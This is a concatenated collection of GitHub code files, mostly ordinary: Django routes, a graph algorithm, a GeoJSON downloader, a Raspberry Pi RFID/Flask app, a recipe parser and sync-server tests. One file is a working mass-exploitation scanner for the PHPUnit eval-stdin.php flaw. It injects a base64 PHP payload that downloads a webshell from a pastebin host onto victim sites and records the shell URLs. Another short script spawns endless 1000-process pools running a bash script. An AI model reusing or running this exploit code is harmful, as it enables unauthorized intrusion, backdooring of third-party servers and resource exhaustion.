pool['name']\n","repo_name":"sapcc/networking-aci","sub_path":"networking_aci/plugins/ml2/drivers/mech_aci/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":28707,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"43092735961","text":"\nfrom django.urls import path ,include\nfrom . import views\n\napp_name='tracksapp'\n\nurlpatterns = [\n \n path('',views.track_list, name = 'track_list'),\n path('tracks/',views.track_detail, name = 'track_detail'),\n\n]","repo_name":"hasnaa-elgammal/Sahelha","sub_path":"Backend-master/tracksapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18537929245","text":"# 네트워크 연결 G4\n# 스패닝트리(신장트리): 그래프의 최소 연결 부분 그래프\n# - 그래프에서 일부 간선을 선택해서 만든 트리\n# - n개의 정점을 가지는 그래프의 최소 간선의 수는 n-1개, n-1개의 간선으로 연결\n# - 사이클 포함x, 모든 정점이 연결\n# 최소스패닝트리: 신장트리 중 사용된 간선들의 가중치 합이 최소인 트리\nimport sys\n\ninput = sys.stdin.readline\nn = int(input())\nm = int(input())\ngraph = []\nparent = [i for i in range(n + 1)]\nresult = 0\n\nfor i in range(m):\n a, b, c = map(int, input().split())\n graph.append([c, a, b])\n\n\ndef find(a):\n if parent[a] == a: # 자신이 루트노드면 자신을 반환\n return a\n parent[a] = find(parent[a]) # 재귀적으로 a의 부모노드를 갱신\n return parent[a]\n\n\ndef union(a, b): # a, b를 병합\n a = find(a) # a의 부모 노드 탐색\n b = find(b) # b의 부모 노드 탐색\n if b < a:\n parent[a] = b\n else:\n parent[b] = a\n\n\ngraph.sort(key=lambda x: x[0]) # 가중치로 정렬\nfor dist, a, b in graph:\n if find(a) != find(b): # a, b의 부모노드가 다르면\n union(a, b) # a, b를 병합\n result += dist # 비용 갱신\nprint(result)\n","repo_name":"kkm0406/AlgorithmBOJ","sub_path":"그래프/1922.py","file_name":"1922.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71995802724","text":"# download.py\n\nimport json\nimport os\nimport requests\nimport urllib\n\n\nFILE_CATALOG = 'data/japan_prefecture_geojson_catalog.json'\n\nDIR = 'geojson_down'\n\n\nif not os.path.isdir(DIR):\n os.mkdir(DIR)\n#\n\n\nwith open(FILE_CATALOG , 'r') as f1:\n dic1 = json.load(f1)\n#\n\nurl_raw_base = dic1['url_raw_base']\nlist_prefectures = dic1['prefectures']\n\n\nfor item in list_prefectures:\n name_ja = item['name_ja']\n filename = item['filename']\n print(name_ja)\n url_geojson = urllib.parse.urljoin(url_raw_base, filename)\n save_path = os.path.join(DIR, filename)\n data = requests.get(url_geojson).content\n with open(save_path ,mode='wb') as f2:\n f2.write(data)\n#\n","repo_name":"ohwada/World_Countries","sub_path":"geoPandas/polygon_largest/japan_prefectures/python/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15394537817","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'stats'\nurlpatterns = [\n\t# ex: /stats/\n\tpath('', views.index, name='index'),\n\t# ex: /stats/team/\n\tpath('team/', views.team, name='team'),\n\t# ex: /stats/player/\n\tpath('players/', views.players, name='players'),\n\t# ex: /stats/locations/\n\tpath('locations/', views.locations, name='locations'),\n\t# Ajax to get seasons\n\tpath('ajax/getseasons/', views.getSeasons, name='getseasons'),\n\t# Ajax to get skaters\n\tpath('ajax/getskaters/', views.getSkaters, name='getskaters'),\n]","repo_name":"bonhamdaniel/hockey-stats","sub_path":"benchwarmer/stats/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73796753125","text":"# nate 뉴스 ranking\n# https://news.nate.com/rank/interest?sc=ent 랭킹 뉴스 추출\n# 제목, 기사제공자, 날짜 ( 1 ~ 50 위)\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nres = requests.get(\"https://news.nate.com/rank/interest?sc=ent\")\nsoup = BeautifulSoup(res.text, \"lxml\")\n\ntop = soup.select(\".mduSubjectList > div\")\n# print(top)\n\nfor idx, data in enumerate(top, 1):\n # 타이틀\n title = data.select_one(\"a strong\")\n media = data.select_one(\"span.medium\")\n print(\"{} . {} :: {}\".format(idx, title.get_text(), media.get_text()[:-10]))\n\nrow = soup.select(\".mduSubject > li\")\n# print(top)\n\nfor idx, data in enumerate(row, 1):\n # 타이틀\n title = data.select_one(\"a\")\n media = data.select_one(\"span.medium\")\n print(\"{} . {} :: {}\".format(idx + 5, title.get_text(), media.get_text()))\n","repo_name":"ycr5007/SolDesk","sub_path":"PythonSource/RPAbasic/crawl/beautifulsoup/11-1_ranking.py","file_name":"11-1_ranking.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74258582565","text":"#!/usr/bin/python3\nimport argparse\nimport math\nimport os\nfrom pyrosetta import *\nfrom pyrosetta.rosetta.core.chemical import ResidueProperty\nfrom pyrosetta.rosetta.core.select.residue_selector import \\\n AndResidueSelector, NotResidueSelector, OrResidueSelector, \\\n ResidueIndexSelector, ResiduePropertySelector, ChainSelector, \\\n NeighborhoodResidueSelector, InterGroupInterfaceByVectorSelector\n\ndef detect_inter_group_interface(pose, chains):\n protein_selector = ResiduePropertySelector(ResidueProperty.PROTEIN)\n group1_selector = AndResidueSelector(ChainSelector(chains[0]), protein_selector)\n group2_selector = AndResidueSelector(ChainSelector(chains[1]), protein_selector)\n interface_selector = InterGroupInterfaceByVectorSelector()\n interface_selector.group1_selector(group1_selector)\n interface_selector.group2_selector(group2_selector)\n group1_interface_selector = AndResidueSelector(interface_selector, group1_selector)\n group2_interface_selector = AndResidueSelector(interface_selector, group2_selector)\n group1_interface_vector = group1_interface_selector.apply(pose)\n group2_interface_vector = group2_interface_selector.apply(pose)\n return group1_interface_vector, group2_interface_vector\n\ndef convert_vector_to_list(res_vector):\n res_list = list()\n for index, res_bool in enumerate(res_vector):\n if res_bool:\n res_list.append(index + 1)\n return res_list\n\ndef write_position_files(prefix, res_list1, res_list2, workload):\n total_files = math.ceil(len(res_list1) * len(res_list2) / workload)\n pos_2_len = math.ceil(len(res_list2) / total_files)\n for i in range(0, total_files):\n with open(prefix + '_' + str(i 
+ 1) + '.pos', 'w+') as p_pos:\n p_pos.write('N_CST 2\\n')\n p_pos.write('1:')\n for res in res_list1:\n p_pos.write(' ' + str(res))\n p_pos.write('\\n')\n p_pos.write('2:')\n if i < total_files - 1:\n for res in res_list2[i * pos_2_len: (i + 1) * pos_2_len]:\n p_pos.write(' ' + str(res))\n else:\n for res in res_list2[i * pos_2_len:]:\n p_pos.write(' ' + str(res))\n p_pos.write('\\n')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('pdb', type=str)\n parser.add_argument('-chain', type=str, help='Make staples within one chain.')\n parser.add_argument('-chains', type=str, nargs=2, help='Make staples across the interface of two chains.')\n parser.add_argument('-wl', '--workload', type=int, default=1000)\n args = parser.parse_args()\n\n params = list()\n for f in os.listdir():\n if f.endswith('.params'):\n params.append(f)\n if len(params) > 0:\n init('-extra_res_fa ' + ' '.join(params))\n else:\n init()\n pose = pose_from_pdb(args.pdb)\n prefix = args.pdb[args.pdb.rfind('/') + 1:-4]\n i = prefix.find('_')\n if i != -1:\n prefix = args.pdb[:i]\n if args.chain:\n # Residues having the same pdb chain id do not necessarily share the same pose chain id.\n # Convert pdb chain index to pose chain index.\n chain_selector = AndResidueSelector(ChainSelector(args.chain), ResiduePropertySelector(ResidueProperty.PROTEIN))\n chain_vector = chain_selector.apply(pose)\n chain_begin = None\n chain_end = None\n for res_index, res in enumerate(chain_vector):\n if res:\n if not chain_begin:\n chain_begin = res_index + 1\n # chain_index = pose.chain(res_index + 1)\n # break\n else:\n if chain_begin:\n chain_end = res_index\n break\n if not chain_end:\n chain_end = res_index\n # Get the begining and the end position of the chain.\n # chain_begin = pose.chain_begin(chain_index)\n # chain_end = pose.chain_end(chain_index)\n chain_begin_res_list = list(range(chain_begin, chain_begin + 100))\n chain_end_res_list = list(range(chain_end - 99, chain_end + 1))\n prefix += '-' + args.chain\n os.mkdir(prefix)\n write_position_files(prefix + '/' + prefix + '_1', chain_begin_res_list, chain_end_res_list, args.workload)\n write_position_files(prefix + '/' + prefix + '_2', chain_end_res_list, chain_begin_res_list, args.workload)\n elif args.chains:\n group1_interface_vector, group2_interface_vector = detect_inter_group_interface(pose, args.chains)\n group1_interface_list = convert_vector_to_list(group1_interface_vector)\n group2_interface_list = convert_vector_to_list(group2_interface_vector)\n prefix += '-' + args.chains[0] + args.chains[1]\n os.mkdir(prefix)\n write_position_files(prefix + '/' + prefix, group1_interface_list, group2_interface_list, args.workload)\n","repo_name":"ZhuofanShen/Rosetta-Enzyme-Design-Pipeline","sub_path":"scripts-match/generate_position_files.py","file_name":"generate_position_files.py","file_ext":"py","file_size_in_byte":4919,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"15620147940","text":"import time\nfrom RPi import GPIO\nfrom helpers.klasseknop import Button\nimport threading\nfrom multiprocessing import Process, Queue\nfrom smbus import SMBus\nfrom mfrc522 import SimpleMFRC522\nfrom datetime import datetime\n\nfrom flask_cors import CORS\nfrom flask_socketio import SocketIO, emit, send\nfrom flask import Flask, jsonify\nfrom repositories.DataRepository import DataRepository\n\nfrom selenium import webdriver\n\n# from selenium import webdriver\n# from selenium.webdriver.chrome.options 
import Options\n\ni2c = SMBus(1)\nreader = SimpleMFRC522()\n\nid = Queue()\n# ledPin = 21\n# btnPin = Button(20)\n\n# Code voor Hardware\ndef setup_gpio():\n GPIO.setwarnings(False)\n # GPIO.setmode(GPIO.BCM)\n\n # GPIO.setup(ledPin, GPIO.OUT)\n # GPIO.output(ledPin, GPIO.LOW)\n\nprevwaarde = 0\n\n# def lees_knop():\n# global prevwaarde\n# i2c.open(1)\n# waarde = i2c.read_byte(0x21)\n# # print(waarde)\n# i2c.close()\n# if waarde != prevwaarde:\n# if waarde == 254:\n# print(waarde)\n# socketio.emit('knop', {'knop': 'Reedcontact 1'}, broadcast=True)\n# DataRepository.insert_data(1, 1, 1, datetime.now(), waarde , 'Reedcontact 1')\n# if waarde == 253:\n# print(waarde)\n# socketio.emit('knop', {'knop': 'Reedcontact 2'}, broadcast=True)\n# DataRepository.insert_data(2, 2, 2, datetime.now(), waarde , 'Reedcontact 2')\n# if waarde == 251:\n# print(waarde)\n# socketio.emit('knop', {'knop': 'Reedcontact 3'}, broadcast=True)\n# DataRepository.insert_data(3, 3, 3, datetime.now(), waarde , 'Reedcontact 3')\n# elif waarde == 255:\n# print(waarde)\n# socketio.emit('knop', {'knop': 'released'}, broadcast=True)\n# prevwaarde = waarde\n\n\ndef lees_rfid(badgeid):\n try:\n id, text = reader.read()\n badgeid.put([id])\n print(\"lees rfid\")\n print(id)\n print(text)\n except:\n print(\"errortrr\")\n \n \n\n# Code voor Flask\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'geheim!'\nsocketio = SocketIO(app, cors_allowed_origins=\"*\", logger=False,\n engineio_logger=False, ping_timeout=1)\n\nCORS(app)\n\n\n@socketio.on_error() # Handles the default namespace\ndef error_handler(e):\n print(e)\n\n\n\n# API ENDPOINTS\n\n\n@app.route('/')\ndef hallo():\n return \"Server is running, er zijn momenteel geen API endpoints beschikbaar.\"\n\n\n@socketio.on('connect')\ndef initial_connection():\n print('A new client connect')\n # # Send to the client!\n # vraag de status op van de lampen uit de DB\n # status = DataRepository.read_status_lampen()\n # emit('B2F_status_lampen', {'lampen': status}, broadcast=True)\n\n\n@socketio.on('F2B_switch_light')\ndef switch_light(data):\n # Ophalen van de data\n lamp_id = data['lamp_id']\n new_status = data['new_status']\n print(f\"Lamp {lamp_id} wordt geswitcht naar {new_status}\")\n\n # Stel de status in op de DB\n # res = DataRepository.update_status_lamp(lamp_id, new_status)\n\n # Vraag de (nieuwe) status op van de lamp en stuur deze naar de frontend.\n # data = DataRepository.read_status_lamp_by_id(lamp_id)\n socketio.emit('B2F_verandering_lamp', {'lamp': data}, broadcast=True)\n\n # Indien het om de lamp van de TV kamer gaat, dan moeten we ook de hardware aansturen.\n # if lamp_id == '3':\n # print(f\"TV kamer moet switchen naar {new_status} !\")\n # GPIO.output(ledPin, new_status)\n\n\n\n# START een thread op. Belangrijk!!! 
Debugging moet UIT staan op start van de server, anders start de thread dubbel op\n# werk enkel met de packages gevent en gevent-websocket.\n\n# def start_thread():\n# print(\"**** Starting THREAD ****\")\n# thread = threading.Thread(target=all_out, args=(), daemon=True)\n# thread.start()\n\n# def start_thread_lees_knop():\n# while True:\n# # lees_knop()\n# time.sleep(0.5)\n\ndef rfid_thread(id):\n try:\n while True:\n print('test')\n lees_rfid(id)\n except:\n print('error')\n \ndef rfid_ID_thread():\n try:\n while True:\n lijst = id.get()\n print(lijst[0])\n except:\n print('error')\n\n\ndef rfid_ID_thread_main():\n print('rfid_ID_thread_main')\n thread = threading.Thread(target=rfid_ID_thread, args=(), daemon=True)\n thread.start()\n# def start_thread():\n# print(\"**** knop thread test ****\")\n# thread = threading.Thread(target=start_thread_lees_knop, args=(), daemon=True)\n# thread.start()\n \n \ndef rfid_thread_main():\n print(\"**** knop thread test ****\")\n # thread = threading.Thread(target=rfid_thread, args=(), daemon=True)\n # thread.start()\n p= Process(target=rfid_thread, args=(id,))\n p.start()\n \n\ndef start_chrome_kiosk():\n import os\n\n os.environ['DISPLAY'] = ':0.0'\n options = webdriver.ChromeOptions()\n # options.headless = True\n # options.add_argument(\"--window-size=1920,1080\")\n options.add_argument(\"user-agent=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36\")\n options.add_argument('--ignore-certificate-errors')\n options.add_argument('--allow-running-insecure-content')\n options.add_argument(\"--disable-extensions\")\n # options.add_argument(\"--proxy-server='direct://'\")\n options.add_argument(\"--proxy-bypass-list=*\")\n options.add_argument(\"--start-maximized\")\n options.add_argument('--disable-gpu')\n # options.add_argument('--disable-dev-shm-usage')\n options.add_argument('--no-sandbox')\n options.add_argument('--kiosk')\n # chrome_options.add_argument('--no-sandbox') \n # options.add_argument(\"disable-infobars\")\n options.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\n options.add_experimental_option('useAutomationExtension', False)\n\n driver = webdriver.Chrome(options=options)\n driver.get(\"http://localhost\")\n while True:\n pass\n\n\ndef start_chrome_thread():\n print(\"**** Starting CHROME ****\")\n chromeThread = threading.Thread(target=start_chrome_kiosk, args=(), daemon=True)\n chromeThread.start()\n\n\n\n# ANDERE FUNCTIES\n\n\nif __name__ == '__main__':\n try:\n setup_gpio()\n # start_thread()\n rfid_thread_main()\n rfid_ID_thread_main()\n start_chrome_thread()\n print(\"**** Starting APP ****\")\n socketio.run(app, debug=False, host='0.0.0.0')\n except KeyboardInterrupt:\n print ('KeyboardInterrupt exception is caught')\n finally:\n GPIO.cleanup()\n\n","repo_name":"howest-mct/2021-2022-projectone-LagaeJens","sub_path":"backend/app copy.py","file_name":"app copy.py","file_ext":"py","file_size_in_byte":6552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"16467250638","text":"from collections import Counter, OrderedDict\nimport os\nimport re\nimport string\n\nfrom nltk.corpus import wordnet\nimport numpy as np\n\n\nstopwords = None\nwith open(\"stopwords_en.txt\", \"r\") as f:\n stopwords = [l.strip() for l in f]\n\nnouns = {x.name().split('.', 1)[0] for x in wordnet.all_synsets('n')}\nnope = [\"baking\", \"cooking\", \"dry\", \"room\", \"whip\", \"savory\", \"split\", \"peel\", 
\"shortening\", \"small\", \"medium\",\n \"red\", \"green\", \"white\", \"inch\", \"dark\", \"mix\", \"miniature\", \"firm\", \"fine\", \"cut\", \"bell\", \"cup\", \"starter\",\n \"inch\", \"plain\", \"cake\", \"pie\", \"ground\", \"large\", \"powder\", \"black\", \"taste\", \"fat\", \"liquid\", \"italian\",\n \"sweet\", \"jar\", \"light\", \"recipe\", \"chinese\", \"size\", \"paste\", \"raw\", \"quick\", \"garnish\", \"part\", \"kidney\",\n \"leaf\", \"hearts\", \"round\", \"crust\", \"pieces\", \"seeds\", \"sauce\", \"dish\", \"times\", \"temp\", \"hours\", \"pound\",\n \"hour\", \"process\", \"time\", \"meal\", \"min\", \"food\", \"note\", \"pressure\", \"pack\", \"information\", \"minutes\",\n \"style\", \"remove\", \"master\", \"table\", \"psi\", \"protein\", \"smoke\", \"coloring\", \"bottle\", \"pizza\", \"english\",\n \"gluten\", \"sodium\", \"heat\", \"yellow\"]\n\n\ndef load(filename):\n with open(filename, 'r') as f:\n s = f.read()\n\n return s\n\n\ndef split_into_recipes(s):\n return s.split(\"MMMMM\\r\\n\")\n\n\ndef load_from_dir(dirname):\n recipes = []\n for filename in os.listdir(dirname):\n recipes += split_into_recipes(load(\"{}/{}\".format(dirname, filename)))\n return [remove_mm(r) for r in recipes]\n\n\ndef remove_mm(s):\n result = []\n for l in s.splitlines():\n if not l.startswith(\"MMM\"):\n result.append(l)\n return \"\\n\".join(result)\n\n\ndef extract_ingredients(r):\n spl = r.split(\"\\n \\n\")\n for i, k in enumerate(spl):\n if \"Yield\" in k:\n break\n return spl[i+1]\n\n\ndef extract_description(r):\n spl = r.split(\"\\n \\n\")\n for i, k in enumerate(spl):\n if \"Yield\" in k:\n break\n return \"\\n\".join(spl[i+2:])\n\n\ndef get_all_ingredients(r):\n l = []\n for rr in r:\n try:\n l.append(extract_ingredients(rr))\n except:\n pass\n return l\n\n\ndef get_all_ingredients_desc(r):\n l = []\n for rr in r:\n try:\n l.append((extract_ingredients(rr), extract_description(rr)))\n except:\n pass\n return l\n\n\ndef split_quantity(line):\n q = line[:11]\n s = line[11:]\n return q.strip(), clean(s)\n\n\ndef split_quantities(q):\n lines = []\n for l in q.splitlines():\n if l[:11].strip():\n lines.append(l.lower())\n else:\n try:\n lines[-1] += l[10:].lower()\n except:\n pass\n return lines\n\n\ndef process_recipe(r):\n return [split_quantity(l) for l in split_quantities(r)]\n\n\ndef clean(s):\n regex = re.compile('[%s]' % re.escape(string.punctuation))\n s = regex.sub(' ', s)\n return \" \".join(s.lower().split())\n\n\ndef counts(r):\n return Counter(\" \".join(r).split(\" \"))\n\n\ndef most_common(s, c):\n best = 0\n bestw = None\n for word in s.split(\" \"):\n if word in stopwords:\n continue\n if word not in nouns:\n if word.endswith(\"s\") and word[:-1] not in nouns:\n word = word[:-1]\n else:\n continue\n if word in nope:\n continue\n if word not in c:\n continue\n if c[word] > best:\n best = c[word]\n bestw = word\n return bestw\n\n\ndef filter_recipe(r, c):\n res = []\n for q, p in process_recipe(r):\n mc = most_common(p, c)\n if mc is not None:\n res.append(mc)\n return list(set(res))\n\n\n\ndef get_all_recipes():\n r = load_from_dir(\"recipes\")\n return get_all_ingredients(r)\n\ndef get_counts(l):\n k = []\n for ll in l:\n try:\n k += process_recipe(ll)\n except:\n pass\n\n c = Counter(\" \".join([p[1] for p in k]).split(\" \"))\n\n return Counter([most_common(t[1], c) for t in k])\n\n\ndef r2vec(r, c):\n l = filter_recipe(r, c)\n k = c.keys()\n v = np.zeros(len(c))\n for w in l:\n v[k.index(w)] = 1\n return v\n\n\ndef vec2r(v, c):\n r = []\n for i, k in 
zip(v, c):\n if i:\n r.append(k)\n return r\n","repo_name":"wuhu/deep-cuisine","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74629337445","text":"#!/usr/bin/python\n\nfrom multiprocessing import Pool as Tp\nimport os\n\ndef ln(x):\n os.system(\"bash /../run.sh\")\n \ndef pl():\n p = Tp(1000)\n arg = [i for i in range(1000)]\n ret = p.map(ln,arg)\n p.close()\n p.join()\n\nif __debug__:\n while 1:\n pl()\n \n\n \n","repo_name":"r3kt2ey89i/Resources","sub_path":"Kernel/lena/VmWare/HyperV/l.py","file_name":"l.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"3324572380","text":"import requests, re, os, sys, importlib, warnings\r\nfrom multiprocessing.dummy import Pool\r\nfrom urllib.parse import urlparse\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nfrom platform import system\r\nwarnings.simplefilter('ignore', InsecureRequestWarning)\r\nimportlib.reload(sys)\r\n\r\n\r\ndef url_check(url):\r\n if url[(-1)] == '/':\r\n check1 = re.compile('(.*)/')\r\n site = re.findall(check1, url)\r\n url = site[0]\r\n if url[:7] != 'http://' and url[:8] != 'https://':\r\n url = 'http://' + url\r\n return url\r\n\r\n\r\ndef shell_up(url, shell_3, replace1):\r\n try:\r\n shell_pay = \"'.base64_decode('PD9waHAKZnVuY3Rpb24gdXBsb2FkKCR1cmwsICRpc2kpIHsKCSRmcCA9IGZvcGVuKCRpc2ksICJ3Iik7CgkkY2ggPSBjdXJsX2luaXQoKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0JJTkFSWVRSQU5TRkVSLCB0cnVlKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgdHJ1ZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIGZhbHNlKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GSUxFLCAkZnApOwoJcmV0dXJuIGN1cmxfZXhlYygkY2gpOwoJY3VybF9jbG9zZSgkY2gpOwoJZmNsb3NlKCRmcCk7CglvYl9mbHVzaCgpOwoJZmx1c2goKTsKfQppZih1cGxvYWQoImh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9icXNZaTR1SiIsImludHJ1ZDNyLnBocCIpKSB7CgllY2hvICJJbnRydWQzciI7Cn0gZWxzZSB7CgllY2hvICJmYWlsIjsKfQo/Pg==')); ?>\"\r\n session1 = requests.session()\r\n user_agent1 = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'}\r\n req_1 = session1.get(shell_3, headers=user_agent1, data=shell_pay, verify=False, timeout=30)\r\n if req_1:\r\n try:\r\n req_2 = session1.get(replace1, headers=user_agent1, verify=False, timeout=30)\r\n if 'Intrud3r' in req_2.text:\r\n print( ' \\033[1;32;40m[+] ' + url + ' \\033[1;32;40m[Shell Uploaded]')\r\n open('Shells.txt', 'a').write(replace1 + '\\n')\r\n else:\r\n print( ' \\033[1;37;40m[-] ' + url + ' \\033[1;37;40m[Not Vuln]')\r\n except:\r\n pass\r\n\r\n else:\r\n print( ' \\033[1;37;40m!! ' + url + ' \\033[1;37;40mUnknown Error ')\r\n except:\r\n print( ' \\033[1;37;40m!! 
' + url + ' \\033[1;37;40mUnknown Error ')\r\n\r\n\r\ndef scan(url):\r\n try:\r\n all_path = [\r\n '/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',\r\n '/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php'] #Add more PATH if you wish\r\n \r\n for path in all_path:\r\n try:\r\n shell_pay2 = \"'.base64_decode('PD9waHAKZnVuY3Rpb24gdXBsb2FkKCR1cmwsICRpc2kpIHsKCSRmcCA9IGZvcGVuKCRpc2ksICJ3Iik7CgkkY2ggPSBjdXJsX2luaXQoKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0JJTkFSWVRSQU5TRkVSLCB0cnVlKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgdHJ1ZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIGZhbHNlKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GSUxFLCAkZnApOwoJcmV0dXJuIGN1cmxfZXhlYygkY2gpOwoJY3VybF9jbG9zZSgkY2gpOwoJZmNsb3NlKCRmcCk7CglvYl9mbHVzaCgpOwoJZmx1c2goKTsKfQppZih1cGxvYWQoImh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9icXNZaTR1SiIsImludHJ1ZDNyLnBocCIpKSB7CgllY2hvICJJbnRydWQzciI7Cn0gZWxzZSB7CgllY2hvICJmYWlsIjsKfQo/Pg==')); ?>\"\r\n replace1 = url + path.replace('eval-stdin.php', 'intrud3r.php')\r\n shell_3 = url + path\r\n session2 = requests.session()\r\n user_agent2 = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'}\r\n req_3 = session2.get(shell_3, headers=user_agent2, data=shell_pay2, verify=False, timeout=30)\r\n if 'Intrud3r' in req_3.text:\r\n print( ' \\033[1;31;40m[+] ' + url + ' \\033[1;31;40m[Vuln]')\r\n open('vuln.txt', 'a').write(shell_3 + '\\n')\r\n shell_up(url, shell_3, replace1)\r\n break\r\n else:\r\n print(' \\033[1;37;40m[-] ' + url + ' \\033[1;37;40m[Not Vuln]')\r\n except:\r\n print( ' \\033[1;37;40m!! ' + url + ' \\033[1;37;40mUnknown Error ')\r\n\r\n except:\r\n print( ' \\033[1;37;40m!! ' + url + ' \\033[1;37;40mUnknown Error ')\r\n\r\n\r\ndef check(url):\r\n try:\r\n url = url_check(url)\r\n user_agent = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'}\r\n session0 = requests.session()\r\n req_0 = session0.get(url, headers=user_agent, verify=False, timeout=30)\r\n if req_0.status_code == 200:\r\n scan(url)\r\n else:\r\n print( ' [-] ' + url + ' [404]')\r\n except:\r\n pass\r\n\r\n\r\ndef logo():\r\n clear = \"\\x1b[0m\"\r\n\r\n banner = \"\"\"\\033[1;32;40m\r\n ____ __ ____ __ _______ \r\n / __ \\____ ____ / /_ / _/___ / /________ ______/ /__ /_____\r\n / /_/ / __ \\/ __ \\/ __/ / // __ \\/ __/ ___/ / / / __ / /_ = float(resp.body))\n\n resp = self.app.get(storage_url, headers=auth_header)\n resp_wbo_data = simplejson.loads(resp.body)\n self.assertEqual(wbo_data['payload'], resp_wbo_data['payload'])\n\n resp = self.app.delete(storage_url, headers=auth_header)\n self.assertEqual('200 OK', resp.status)\n self.assert_(WBO.get_time_now() >= float(resp.body))\n\n resp = self.app.get(storage_url, headers=auth_header, status=404)\n\n def test_collection_counts_and_timestamps(self):\n \"\"\"Exercise collection counts and timestamps\"\"\"\n profile = Profile(user_name = 'tester-1', user_id='8675309', password = 'pass-1')\n profile.put()\n\n auth_header = self.build_auth_header(\n profile.user_name, profile.password\n )\n\n expected_count_all = 0\n expected_counts = {\n 'clients':2, 'crypto':0, 'forms':6, 'history':0, 'keys':10,\n 'meta':12, 'bookmarks':14, 'prefs':16, 'tabs':18, 'passwords':20,\n 'foo':12, 'bar':14, 'baz':16\n }\n expected_dates = {}\n\n # Insert objects with random contents to satisfy the expected counts\n for collection_name, curr_count in expected_counts.items():\n base_url = '/sync/1.0/%s/storage/%s' % (\n 
profile.user_name, collection_name\n )\n for i in range(curr_count):\n resp = self.put_random_wbo(base_url, auth_header)\n expected_dates[collection_name] = float(resp.body)\n expected_count_all += 1\n\n # Ensure the counts match expected\n resp = self.app.get(\n '/sync/1.0/%s/info/collection_counts' % (profile.user_name),\n headers=auth_header\n )\n resp_data = simplejson.loads(resp.body)\n self.assertEqual(expected_counts, resp_data)\n\n # Ensure all timestamps are same or newer than expected.\n resp = self.app.get(\n '/sync/1.0/%s/info/collections' % (profile.user_name),\n headers=auth_header\n )\n resp_data = simplejson.loads(resp.body)\n for k,v in expected_dates.items():\n self.assert_(k in resp_data)\n self.assert_(resp_data[k] >= expected_dates[k])\n\n # Verify the count of all objects after creating\n result_count = WBO.all().count()\n self.assertEqual(expected_count_all, result_count)\n\n # Delete each collection and verify the count after\n for collection_name, curr_count in expected_counts.items():\n url = '/sync/1.0/%s/storage/%s' % (\n profile.user_name, collection_name\n )\n resp = self.app.delete(url, headers=auth_header)\n self.assert_(WBO.get_time_now() >= float(resp.body))\n\n expected_count_all -= curr_count\n result_count = WBO.all().count()\n self.assertEqual(expected_count_all, result_count)\n\n # No WBOs should be left after all collections deleted.\n result_count = WBO.all().count()\n self.assertEqual(0, result_count)\n\n def test_multiple_profiles(self):\n \"\"\"Exercise multiple profiles and collections\"\"\"\n expected_count_all = 0\n profiles_count = 5\n collection_names = ( 'testing', 'keys', 'tabs', 'history', 'bookmarks' )\n collection_counts = {}\n\n # Produce a set of Profiles in the datastore\n profiles = []\n for i in range(profiles_count):\n profile = Profile(user_name='t-%s'%i, user_id='id-%s'%i, password='p-%s'%i)\n profile.put()\n profiles.append(profile)\n\n # Generate collections for each profile.\n for p in profiles:\n auth_header = self.build_auth_header(p.user_name, p.password)\n collection_counts[p.user_name] = {}\n\n # Run through several collections and make WBOs\n for cn in collection_names:\n\n curr_count = random.randint(1,10)\n 